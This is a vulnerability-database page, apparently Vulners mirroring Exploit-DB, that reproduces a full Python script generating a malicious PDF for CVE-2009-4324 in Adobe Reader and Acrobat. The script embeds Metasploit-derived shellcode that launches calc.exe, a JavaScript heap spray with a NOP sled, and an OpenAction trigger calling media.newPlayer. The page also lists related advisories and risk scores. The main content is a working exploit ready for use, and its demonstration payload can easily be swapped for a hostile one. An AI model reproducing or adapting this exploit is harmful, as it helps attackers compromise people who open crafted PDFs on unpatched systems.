Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Reader / Acrobat - '.PDF' File Overflow

🗓️ 23 Dec 2009 00:00:00Reported by Ahmed ObiedType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 42 Views

Program generates PDF exploit for Adobe Reader / Acroba

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Adobe Reader and Acrobat (CVE-2009-4324) Exploit
23 Dec 200900:00
zdt
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Adobe Acrobat
27 Jul 202504:17
gitee
canvas		Immunity Canvas: ACROBAT_NEWPLAYER
15 Dec 200902:30
canvas
Tenable Nessus		Adobe Acrobat < 9.3 / 8.2 Multiple Vulnerabilities (APSB10-02)
13 Jan 201000:00
nessus
Tenable Nessus		Adobe Reader < 9.3 / 8.2 Multiple Vulnerabilities (APSB10-02)
13 Jan 201000:00
nessus
Tenable Nessus		GLSA-201009-05 : Adobe Reader: Multiple vulnerabilities
8 Sep 201000:00
nessus
Tenable Nessus		RHEL 5 : acroread (RHSA-2010:0037)
24 Jan 201300:00
nessus
Tenable Nessus		RHEL 4 : acroread (RHSA-2010:0038)
24 Jan 201300:00
nessus
Tenable Nessus		RHEL 3 : acroread (RHSA-2010:0060)
24 Jan 201300:00
nessus
Tenable Nessus		openSUSE Security Update : acroread (acroread-1849)
25 Jan 201000:00
nessus
Rows per page
#
#   Author : Ahmed Obied ([email protected])
#
#   This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) 
#   in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe 
#   Reader 9.2.0 on Windows XP SP3. The exploit's payload spawns the calculator.
#
#   Usage  : python adobe_newplayer.py [output file name]
#   

import sys

class PDF:
    
    def __init__(self):
        self.xrefs = []
        self.eol = '\x0d\x0a'
        self.content = ''
        self.xrefs_offset = 0
               
    def header(self):
        self.content += '%PDF-1.1' + self.eol  
    
    def obj(self, obj_num, data):
        self.xrefs.append(len(self.content))
        self.content += '%d 0 obj' % obj_num
        self.content += self.eol + '<< ' + data + ' >>' + self.eol
        self.content += 'endobj' + self.eol
    
    def ref(self, ref_num):
        return '%d 0 R' % ref_num 
    
    def xref(self):
        self.xrefs_offset = len(self.content)
        self.content += 'xref' + self.eol
        self.content += '0 %d' % (len(self.xrefs) + 1)
        self.content += self.eol
        self.content += '0000000000 65535 f' + self.eol
        for i in self.xrefs:
            self.content += '%010d 00000 n' % i
            self.content += self.eol
     
    def trailer(self):
        self.content += 'trailer' + self.eol
        self.content += '<< /Size %d' % (len(self.xrefs) + 1)
        self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
        self.content += 'startxref' + self.eol
        self.content += '%d' % self.xrefs_offset
        self.content += self.eol
        self.content += '%%EOF'
        
    def generate(self):   
        return self.content

class Exploit:
    
    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
            
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)
    
    def get_exploit(self):
        exploit = '''
        
        function spray_heap()
        {
            var chunk_size, payload, nopsled;
            
            chunk_size = 0x8000;
            payload = unescape("<PAYLOAD>");
            nopsled = unescape("<NOP>");
            while (nopsled.length < chunk_size)
                nopsled += nopsled;
            nopsled_len = chunk_size - (payload.length + 20);        
            nopsled = nopsled.substring(0, nopsled_len);
            heap_chunks = new Array();
            for (var i = 0 ; i < <CHUNKS> ; i++)
                heap_chunks[i] = nopsled + payload;
        }    
         
        function trigger_bug()
        {
            util.printd("1.000000000000000000000000 : 0000000", new Date());
            try {
                media.newPlayer(null);
            } catch(e) {}
            util.printd("1.000000000000000000000000 : 0000000", new Date());
        }
        
        spray_heap();
        trigger_bug();
        
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0d0d%u0d0d')
        exploit = exploit.replace('<CHUNKS>', '1200')      
        return exploit   
    
def generate_pdf():
        exploit = Exploit()
        pdf = PDF()
        pdf.header()
        pdf.obj(1, '/Type /Catalog /Outlines ' + pdf.ref(2) + ' /Pages ' + pdf.ref(3) + ' /OpenAction ' + pdf.ref(5))
        pdf.obj(2, '/Type /Outlines /Count 0') 
        pdf.obj(3, '/Type /Pages /Kids [' + pdf.ref(4) + '] /Count 1')
        pdf.obj(4, '/Type /Page /Parent ' + pdf.ref(3) + ' /MediaBox [0 0 612 792]')
        pdf.obj(5, '/Type /Action /S /JavaScript /JS (%s)' % exploit.get_exploit())    
        pdf.xref()
        pdf.trailer()
        return pdf.generate()
           
def main():
    if len(sys.argv) != 2:
        print 'Usage: python %s [output file name]' % sys.argv[0]
        sys.exit(0)
    file_name = sys.argv[1]
    if not file_name.endswith('.pdf'):
        file_name = file_name + '.pdf'
    try:
        fd = open(file_name, 'w')
        fd.write(generate_pdf())    
        fd.close()
        print '[-] PDF file generated and written to %s' % file_name
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
               
if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Dec 2009 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.17.8
CVSS 29.3
EPSS0.92864
SSVC
vulnerability exploitadobe readeracrobatpdf filecve-2009-4324windows xp sp3payloadcalculatorpythonheap exploit
42